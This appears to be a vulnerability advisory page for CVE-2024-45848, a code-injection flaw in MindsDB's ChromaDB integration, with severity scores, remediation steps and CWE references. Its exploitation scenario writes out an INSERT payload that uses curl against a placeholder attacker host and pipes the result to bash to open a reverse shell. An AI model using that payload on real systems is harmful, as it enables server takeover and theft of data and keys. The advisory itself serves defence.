CVE-2024-45848: MindsDB: RCE via eval() injection in ChromaDB INSERT

HIGH PoC AVAILABLE CISA: ATTEND

Published September 12, 2024

CISO Take

Any authenticated user with low-privilege access to a MindsDB instance running the ChromaDB integration can execute arbitrary Python code on the server. Patch immediately to a version above 24.7.4.1, or disable the ChromaDB engine if patching is not immediately possible. Treat any exposed MindsDB instance as fully compromised until remediated.

What is the risk?

HIGH. CVSS 8.8 reflects the reality: network-accessible, low complexity, low privileges required. MindsDB is often deployed as an internal AI data layer, but 'internal' does not mean safe — lateral movement from any compromised account or insider threat is sufficient. The attack requires no user interaction and directly yields code execution on the host running the ML platform.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
mindsdb	—	—	No patch

Do you use mindsdb? You're affected.

How severe is it?

CVSS 3.1

8.8 / 10

EPSS

0.8%

chance of exploitation in 30 days

Higher than 53% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

What should I do?

5 steps

Patch: Upgrade MindsDB to any version beyond 24.7.4.1 — the fix removes the unsafe eval() call.
Workaround: If patching is not immediately possible, disable the ChromaDB integration by removing the chromadb package from the MindsDB environment and restricting CREATE DATABASE with ENGINE=chromadb.
Access control: Enforce least-privilege on MindsDB database users — no user should have INSERT permissions unless explicitly required.
Network segmentation: MindsDB should never be directly internet-facing; enforce firewall rules restricting access to trusted application servers only.
Detection: Alert on SQL INSERT statements targeting ChromaDB engine databases, especially those containing Python builtins (import, os, subprocess, exec, eval, __import__). Monitor for anomalous process spawning from the MindsDB process.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Data Extraction Framework RAG Plugin AML.T0010.001 - AI Software AML.T0037 - Data from Local System AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0072 - Reverse Shell

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.2.3 - AI system security A.9.2 - Assessment of AI system

NIST AI RMF

MANAGE-2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems and manage associated risks

OWASP LLM Top 10

LLM07:2025 - System Prompt Leakage

Frequently Asked Questions

What is CVE-2024-45848?

Is CVE-2024-45848 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-45848, increasing the risk of exploitation.

How to fix CVE-2024-45848?

1. Patch: Upgrade MindsDB to any version beyond 24.7.4.1 — the fix removes the unsafe eval() call. 2. Workaround: If patching is not immediately possible, disable the ChromaDB integration by removing the chromadb package from the MindsDB environment and restricting CREATE DATABASE with ENGINE=chromadb. 3. Access control: Enforce least-privilege on MindsDB database users — no user should have INSERT permissions unless explicitly required. 4. Network segmentation: MindsDB should never be directly internet-facing; enforce firewall rules restricting access to trusted application servers only. 5. Detection: Alert on SQL INSERT statements targeting ChromaDB engine databases, especially those containing Python builtins (import, os, subprocess, exec, eval, __import__). Monitor for anomalous process spawning from the MindsDB process.

What systems are affected by CVE-2024-45848?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, vector databases, AI data platforms, model serving, agent frameworks.

What is the CVSS score for CVE-2024-45848?

CVE-2024-45848 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.84%.

What is the AI security impact?

Affected AI Architectures

RAG pipelinesvector databasesAI data platformsmodel servingagent frameworks

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0037 Data from Local System

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15, Article 9

ISO 42001: A.6.2.3, A.9.2

NIST AI RMF: MANAGE-2.2

OWASP LLM Top 10: LLM07:2025

What are the technical details?

Original Advisory

An arbitrary code execution vulnerability exists in versions 23.12.4.0 up to 24.7.4.1 of the MindsDB platform, when the ChromaDB integration is installed on the server. If a specially crafted ‘INSERT’ query containing Python code is run against a database created with the ChromaDB engine, the code will be passed to an eval function and executed on the server.

Exploitation Scenario

An attacker with valid (low-privilege) MindsDB credentials — obtained via phishing, credential stuffing, or a misconfigured default account — connects to the MindsDB SQL interface. They execute: CREATE DATABASE vuln_db WITH ENGINE='chromadb'; followed by INSERT INTO vuln_db.collection (content) VALUES ('__import__("os").system("curl attacker.com/shell.sh | bash")'). The eval() function in the ChromaDB handler executes the payload server-side, establishing a reverse shell. The attacker now has full access to the host: vector DB contents, training data, API keys in environment variables, and lateral movement paths to adjacent ML services.

Weaknesses (CWE)

CWE-94 Improper Control of Generation of Code ('Code Injection') Primary CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

[Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
[Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.